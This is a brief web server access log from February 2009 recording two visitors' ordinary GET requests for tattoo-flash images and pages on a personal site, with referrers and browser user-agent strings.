71.106.78.231 - - [04/Feb/2009:22:04:23 -0600] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:23 -0600] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:23 -0600] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:24 -0600] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:24 -0600] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:24 -0600] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
24.196.140.195 - - [04/Feb/2009:22:04:37 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3921 "http://www.google.com/search?sourceid=navclient&aq=h5&oq=janaglam.com&ie=UTF-8&rlz=1T4DGUS_enUS310US310&q=vintage+tattoo+flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
24.196.140.195 - - [04/Feb/2009:22:04:37 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
24.196.140.195 - - [04/Feb/2009:22:04:37 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
71.106.78.231 - - [04/Feb/2009:22:04:38 -0600] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
